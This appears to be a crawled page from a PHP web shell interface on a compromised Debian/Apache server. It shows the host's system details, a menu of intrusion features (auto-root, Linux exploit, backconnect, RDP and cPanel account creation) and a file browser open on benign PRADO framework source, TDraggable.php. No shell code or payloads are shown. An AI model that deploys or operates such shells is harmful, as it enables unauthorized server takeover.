Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.118.33.239
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web /
framework /
Web /
UI /
ActiveControls /
[ HOME SHELL ]
Name
Size
Permission
Action
TActiveButton.php
3.98
KB
-rw-r--r--
TActiveCheckBox.php
5.21
KB
-rw-r--r--
TActiveCheckBoxList.php
3.46
KB
-rw-r--r--
TActiveClientScript.php
2.52
KB
-rw-r--r--
TActiveControlAdapter.php
13.61
KB
-rw-r--r--
TActiveCustomValidator.php
7.29
KB
-rw-r--r--
TActiveDataGrid.php
28.01
KB
-rw-r--r--
TActiveDataList.php
3.74
KB
-rw-r--r--
TActiveDatePicker.php
6.11
KB
-rw-r--r--
TActiveDropDownList.php
4.21
KB
-rw-r--r--
TActiveFileUpload.php
15.53
KB
-rw-r--r--
TActiveHiddenField.php
3.44
KB
-rw-r--r--
TActiveHyperLink.php
3.12
KB
-rw-r--r--
TActiveImage.php
2.59
KB
-rw-r--r--
TActiveImageButton.php
5.09
KB
-rw-r--r--
TActiveLabel.php
2.55
KB
-rw-r--r--
TActiveLinkButton.php
4.7
KB
-rw-r--r--
TActiveListBox.php
4.53
KB
-rw-r--r--
TActiveListControlAdapter.php
6.53
KB
-rw-r--r--
TActiveMultiView.php
3.5
KB
-rw-r--r--
TActivePageAdapter.php
12.12
KB
-rw-r--r--
TActivePager.php
6.14
KB
-rw-r--r--
TActivePanel.php
2.74
KB
-rw-r--r--
TActiveRadioButton.php
5.18
KB
-rw-r--r--
TActiveRadioButtonList.php
3.57
KB
-rw-r--r--
TActiveRatingList.php
3.88
KB
-rw-r--r--
TActiveRepeater.php
3.67
KB
-rw-r--r--
TActiveTableCell.php
8.46
KB
-rw-r--r--
TActiveTableRow.php
9.03
KB
-rw-r--r--
TActiveTextBox.php
3.61
KB
-rw-r--r--
TAutoComplete.php
13.18
KB
-rw-r--r--
TBaseActiveControl.php
11.01
KB
-rw-r--r--
TCallback.php
3.01
KB
-rw-r--r--
TCallbackClientScript.php
21.4
KB
-rw-r--r--
TCallbackClientSide.php
8.44
KB
-rw-r--r--
TCallbackEventParameter.php
2.22
KB
-rw-r--r--
TCallbackOptions.php
1.31
KB
-rw-r--r--
TCallbackResponseAdapter.php
3.69
KB
-rw-r--r--
TDraggable.php
8.18
KB
-rw-r--r--
TDropContainer.php
9.48
KB
-rw-r--r--
TEventTriggeredCallback.php
2.43
KB
-rw-r--r--
TInPlaceTextBox.php
8.02
KB
-rw-r--r--
TTimeTriggeredCallback.php
3.49
KB
-rw-r--r--
TTriggeredCallback.php
1.68
KB
-rw-r--r--
TValueTriggeredCallback.php
3.19
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TDraggable.php
<?php /** * TDraggable class file * * @author Christophe BOULAIN (Christophe.Boulain@gmail.com) * @copyright Copyright © 2008, PradoSoft * @license http://www.pradosoft.com/license * @package System.Web.UI.ActiveControls */ /** * TDraggable is a control which can be dragged * * This control will make "draggable" control. * Properties : * * <b>{@link setGhosting Ghosting}</b> : If set to "Ghosting" or "True", the dragged element will be cloned, and the clone will be dragged. * If set to "SuperGhosting", the element will be cloned, and attached to body, so it can be dragged outside of its parent. * If set to "None" of "False" (default), the element itself is dragged * <b>{@link setRevert Revert}</b>: Set to True if you want your dragged element to revert to its initial position if not dropped on a valid area. * <b>{@link setConstraint Constraint}</b>: Set this to Horizontal or Vertical if you want to constraint your move in one direction. * <b>{@link setHandle Handle}</b>: * * @author Christophe BOULAIN (Christophe.Boulain@gmail.com) * @copyright Copyright © 2008, PradoSoft * @license http://www.pradosoft.com/license * @package System.Web.UI.ActiveControls */ class TDraggable extends TPanel { /** * Set the handle id or css class * @param string */ public function setHandle ($value) { $this->setViewState('DragHandle', TPropertyValue::ensureString($value), null); } /** * Get the handle id or css class * @return string */ public function getHandle () { return $this->getViewState('DragHandle', null); } /** * Determine if draggable element should revert to it orginal position * upon release in an non-droppable container. * Since 3.2, Revert property can be set to one of the value of {@link TDraggableRevertOption} enumeration. * o 'True' or 'Revert' : The draggable will revert to it's original position * o 'False' or 'None' : The draggable won't revert to it's original position * o 'Failure' : The draggable will only revert if it's dropped on a non droppable area * @return TDraggableRevertOption true to revert */ public function getRevert() { return $this->getViewState('Revert', TDraggableRevertOptions::Revert); } /** * Sets whether the draggable element should revert to it orginal position * upon release in an non-droppable container. * Since 3.2, Revert property can be set to one of the value of {@link TDraggableRevertOption} enumeration. * o 'True' or 'Revert' : The draggable will revert to it's original position * o 'False' or 'None' : The draggable won't revert to it's original position * o 'Failure' : The draggable will only revert if it's dropped on a non droppable area * @param boolean true to revert */ public function setRevert($value) { if (strcasecmp($value,'true')==0 || $value===true) $value=TDraggableRevertOptions::Revert; elseif (strcasecmp($value,'false')==0 || $value===false) $value=TDraggableRevertOptions::None; $this->setViewState('Revert', TPropertyValue::ensureEnum($value, 'TDraggableRevertOptions'), true); } /** * Determine if the element should be cloned when dragged * If true, Clones the element and drags the clone, leaving the original in place until the clone is dropped. * Defaults to false * Since 3.2, Ghosting can be set to one of the value of {@link TDraggableGhostingOptions} enumeration. * o "True" or "Ghosting" means standard pre-3.2 ghosting mechanism * o "SuperGhosting" use the Superghosting patch by Christopher Williams, which allow elements to be dragged from an * scrollable list * o "False" or "None" means no Ghosting options * * @return TDraggableGhostingOption to clone the element */ public function getGhosting () { return $this->getViewState('Ghosting', TDraggableGhostingOptions::None); } /** * Sets wether the element should be cloned when dragged * If true, Clones the element and drags the clone, leaving the original in place until the clone is dropped. * Defaults to false * * Since 3.2, Ghosting can be set to one of the value of {@link TDraggableGhostingOptions} enumeration. * o "True" or "Ghosting" means standard pre-3.2 ghosting mechanism * o "SuperGhosting" use the Superghosting patch by Christopher Williams, which allow elements to be dragged from an * scrollable list * o "False" or "None" means no Ghosting options * */ public function setGhosting ($value) { if (strcasecmp($value,'true')==0 || $value===true) $value=TDraggableGhostingOptions::Ghosting; elseif (strcasecmp($value,'false')==0 || $value===false) $value=TDraggableGhostingOptions::None; $this->setViewState('Ghosting', TPropertyValue::ensureEnum($value, 'TDraggableGhostingOptions'), TDraggableGhostingOptions::None); } /** * Determine if the element should be constrainted in one direction or not * @return CDraggableConstraint */ public function getConstraint() { return $this->getViewState('Constraint', TDraggableConstraint::None); } /** * Set wether the element should be constrainted in one direction * @param CDraggableConstraint */ public function setConstraint($value) { $this->setViewState('Constraint', TPropertyValue::ensureEnum($value, 'TDraggableConstraint'), TDraggableConstraint::None); } /** * Registers clientscripts * * This method overrides the parent implementation and is invoked before render. * @param mixed event parameter */ public function onPreRender($param) { parent::onPreRender($param); } /** * Ensure that the ID attribute is rendered and registers the javascript code * for initializing the active control. */ protected function addAttributesToRender($writer) { parent::addAttributesToRender($writer); $cs=$this->getPage()->getClientScript(); if ($this->getGhosting()==TDraggableGhostingOptions::SuperGhosting) $cs->registerPradoScript('dragdropextra'); else $cs->registerPradoScript('dragdrop'); $writer->addAttribute('id',$this->getClientID()); $options=TJavascript::encode($this->getPostBackOptions()); $class=$this->getClientClassName(); $code="new {$class}('{$this->getClientId()}', {$options}) "; $cs->registerEndScript(sprintf('%08X', crc32($code)), $code); } /** * Gets the name of the javascript class responsible for performing postback for this control. * This method overrides the parent implementation. * @return string the javascript class name */ protected function getClientClassName () { return 'Draggable'; } /** * Gets the post back options for this textbox. * @return array */ protected function getPostBackOptions() { $options['ID'] = $this->getClientID(); if (($handle=$this->getHandle())!== null) $options['handle']=$handle; if (($revert=$this->getRevert())===TDraggableRevertOptions::None) $options['revert']=false; elseif ($revert==TDraggableRevertOptions::Revert) $options['revert']=true; else $options['revert']=strtolower($revert); if (($constraint=$this->getConstraint())!==TDraggableConstraint::None) $options['constraint']=strtolower($constraint); switch ($this->getGhosting()) { case TDraggableGhostingOptions::SuperGhosting: $options['superghosting']=true; break; case TDraggableGhostingOptions::Ghosting: $options['ghosting']=true; break; } return $options; } } /** * @author Christophe BOULAIN (Christophe.Boulain@gmail.com) * @copyright Copyright © 2008, PradoSoft * @license http://www.pradosoft.com/license * @package System.Web.UI.ActiveControls */ class TDraggableConstraint extends TEnumerable { const None='None'; const Horizontal='Horizontal'; const Vertical='Vertical'; } /** * @author Christophe BOULAIN (Christophe.Boulain@gmail.com) * @copyright Copyright © 2008, PradoSoft * @license http://www.pradosoft.com/license * @package System.Web.UI.ActiveControls */ class TDraggableGhostingOptions extends TEnumerable { const None='None'; const Ghosting='Ghosting'; const SuperGhosting='SuperGhosting'; } /** * @author Christophe BOULAIN (Christophe.Boulain@gmail.com) * @copyright Copyright © 2008, PradoSoft * @license http://www.pradosoft.com/license * @package System.Web.UI.ActiveControls */ class TDraggableRevertOptions extends TEnumerable { const None='None'; const Revert='Revert'; const Failure='Failure'; }
Close